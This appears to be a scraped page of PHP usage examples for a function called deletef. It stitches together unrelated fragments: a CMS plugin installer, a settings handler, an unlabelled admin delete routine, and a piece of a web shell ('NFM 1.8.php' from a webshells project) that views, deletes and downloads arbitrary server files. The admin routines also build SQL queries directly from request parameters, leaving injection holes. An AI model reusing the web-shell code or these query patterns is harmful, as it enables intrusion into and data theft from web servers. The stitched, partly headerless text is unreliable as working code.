function install_action()
 {
     $pname = trim($_GET['tag']);
     $pinfo = $this->_getAllPlugins($pname);
     if ($pinfo) {
         $pinfo = $pinfo['root']['Data']['plugin'];
         $data['available'] = is_array($pinfo['available']) ? $pinfo['available'][0] : $pinfo['available'];
         $data['adminid'] = is_array($pinfo['adminid']) ? $pinfo['adminid'][0] : $pinfo['adminid'];
         $data['name'] = is_array($pinfo['name']) ? $pinfo['name'][0] : $pinfo['name'];
         $data['identifier'] = is_array($pinfo['identifier']) ? $pinfo['identifier'][0] : $pinfo['identifier'];
         $data['description'] = is_array($pinfo['description']) ? $pinfo['description'][0] : $pinfo['description'];
         $data['datatables'] = is_array($pinfo['datatables']) ? $pinfo['datatables'][0] : $pinfo['datatables'];
         $data['directory'] = is_array($pinfo['directory']) ? $pinfo['directory'][0] : $pinfo['directory'];
         $data['copyright'] = is_array($pinfo['copyright']) ? $pinfo['copyright'][0] : $pinfo['copyright'];
         $data['modules'] = serialize($pinfo['modules']['item']);
         $data['version'] = is_array($pinfo['version']) ? $pinfo['version'][0] : $pinfo['version'];
         if ($pid = $this->plugin->InsertData($data)) {
             $vars = $pinfo['vars']['item']['title'] ? $pinfo['vars'] : $pinfo['vars']['item'];
             foreach ($vars as $v) {
                 $vdata['pluginid'] = $pid;
                 $vdata['displayorder'] = is_array($v['displayorder']) ? $v['displayorder'][0] : $v['displayorder'];
                 $vdata['title'] = is_array($v['title']) ? $v['title'][0] : $v['title'];
                 $vdata['description'] = is_array($v['displayorder']) ? $v['displayorder'][0] : $v['displayorder'];
                 $vdata['variable'] = is_array($v['variable']) ? $v['variable'][0] : $v['variable'];
                 $vdata['type'] = is_array($v['type']) ? $v['type'][0] : $v['type'];
                 $vdata['value'] = is_array($v['value']) ? $v['value'][0] : $v['value'];
                 $vdata['extra'] = is_array($v['extra']) ? $v['extra'][0] : $v['extra'];
                 $this->pluginvars->InsertData($vdata);
             }
             $hooks = $pinfo['hooks']['item']['available'] ? $pinfo['hooks'] : $pinfo['hooks']['item'];
             foreach ($hooks as $v) {
                 $hdata['pluginid'] = $pid;
                 $hdata['available'] = intval($v['available']);
                 $hdata['title'] = is_array($v['title']) ? $v['title'][0] : $v['title'];
                 $hdata['description'] = is_array($v['description']) ? $v['description'][0] : $v['description'];
                 $hdata['code'] = is_array($v['code']) ? $v['code'][0] : $v['code'];
                 $this->pluginhooks->InsertData($hdata);
             }
         }
         if ($pinfo['installfile'] && is_file($this->pdir . '/' . $pname . '/' . $pinfo['installfile'])) {
             //include $this->pdir.'/'.$pname.'/'.$pinfo['installfile'];
         }
         deletef('plugins');
     }
 }
예제 #2
0
    function settingdata_action()
    {
        if (submitcheck('commit')) {
            unset($_POST['con']);
            unset($_POST['act']);
            $type = $_POST['dotype'];
            unset($_POST['commit'], $_POST['dotype']);
            $setting_mod = new common('setting');
            if ($_FILES['site_logo']['name']) {
                $filename = explode('.', $_FILES['site_logo']['name']);
                $container = 'and variable="site_logo"';
                $data['content'] = _upload('site_logo', 'data/logo', 'logo.' . $filename[1]);
                $datalist = $setting_mod->GetOne($container);
                if ($datalist) {
                    $setting_mod->UpdateData($data, $container);
                } else {
                    $data['variable'] = 'site_logo';
                    $setting_mod->InsertData($data);
                }
            }
            $changeadmin = '';
            foreach ($_POST as $k => $v) {
                if ($k == 'adminpath' && $v != $GLOBALS['setting']['adminpath']) {
                    $changeadmin = $v;
                }
                $container = 'and variable="' . $k . '"';
                $data['content'] = strip_tags($v);
                $datalist = $setting_mod->GetOne($container);
                if ($datalist) {
                    $updatesql[$k] = $v;
                } else {
                    $insertsql[$k] = $v;
                }
            }
            if ($insertsql) {
                foreach ($insertsql as $key => $val) {
                    $setting_mod->InsertData(array('variable' => $key, 'content' => $val));
                }
            }
            if ($updatesql) {
                foreach ($updatesql as $key => $val) {
                    $setting_mod->UpdateData(array('content' => $val), 'and variable="' . $key . '"');
                }
            }
            if ($type == 'template') {
                $dofile = cleancache('', 'data/compile');
                if (!$dofile) {
                    echo '<SCRIPT LANGUAGE="JavaScript">
					<!--
						alert("模板更新成功,清空系统编译失败,请手动清除");
					//-->
					</SCRIPT>';
                } else {
                    echo '<SCRIPT LANGUAGE="JavaScript">
					<!--
						alert("模板更新成功");
					//-->
					</SCRIPT>';
                }
            }
            deletef('setting');
            if (!empty($changeadmin)) {
                echo '后台路径参数已修改,为了系统安全,请您继续做以下工作:<ul><li>1、连接ftp,将controls/' . $GLOBALS['setting']['adminpath'] . '.class.php文件名修改为:' . $changeadmin . '.class.php</li><li>2、打开' . $changeadmin . '.class.php,将文件中' . $GLOBALS['setting']['adminpath'] . '_controller替换为:' . $changeadmin . '_controller</li><li>3、修改完毕后,<a href="' . SITE_ROOT . '/?con=' . $changeadmin . '" target="_top">重新进入后台</a></li></ul>';
            } else {
                if ($_REQUEST['custom_url']) {
                    sheader($_REQUEST['custom_url'], 3, '修改成功', 'redirect', true);
                } else {
                    sheader('index.php?con=' . $GLOBALS['setting']['adminpath'] . '&act=setting&type=' . $type, 3, '修改成功', 'redirect', true);
                }
            }
        }
    }
예제 #3
0
파일: NFM 1.8.php 프로젝트: Theov/webshells
     }
     getdir();
     chdir($curdir);
     $supsub = $gdir[$j - 1];
     if (!isset($tm)) {
         $tm = getcwd();
     }
     readdirdata($tm);
 } else {
     switch ($action) {
         case "view":
             viewfile($tm, $fi);
             break;
         case "delete":
             echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Файл <b>{$fi}</b> успешно удален.</font></center></td></tr></table>";
             deletef($tm);
             break;
         case "download":
             if (isset($fatt) && strlen($fatt) > 0) {
                 $attach = $fatt;
                 header("Content-type: text/plain");
             } else {
                 $attach = $fi;
                 header("Content-type: hackru");
             }
             header("Content-disposition: attachment; filename=\"{$attach}\";");
             readfile($tm . "/" . $fi);
             break;
         case "download_mail":
             download_mail($tm, $fi);
             break;
 function admin_delete_action()
 {
     $key = empty($_GET['key']) ? 'id' : $_GET['key'];
     if (empty($_GET['table'])) {
         echo '参数有误';
         exit;
     } elseif (empty($_GET['val'])) {
         echo '字段值为空';
         exit;
     } else {
         $val = charset_encode($_GET['val'], $GLOBALS['charset'], 'utf-8');
         $container = "and {$key}='" . trim($val) . "'";
         $obj = new common($_GET['table']);
         if (in_array($_GET['table'], array('site', 'city', 'sitecate'))) {
             deletef($_GET['table']);
         }
         if ($_GET['table'] == 'catelist') {
             deletef('cate');
         }
         $group = $obj->GetOne($container);
         if ($group && $obj->DeleteData('1 ' . $container)) {
             exit('1');
         } else {
             exit('failed');
         }
     }
 }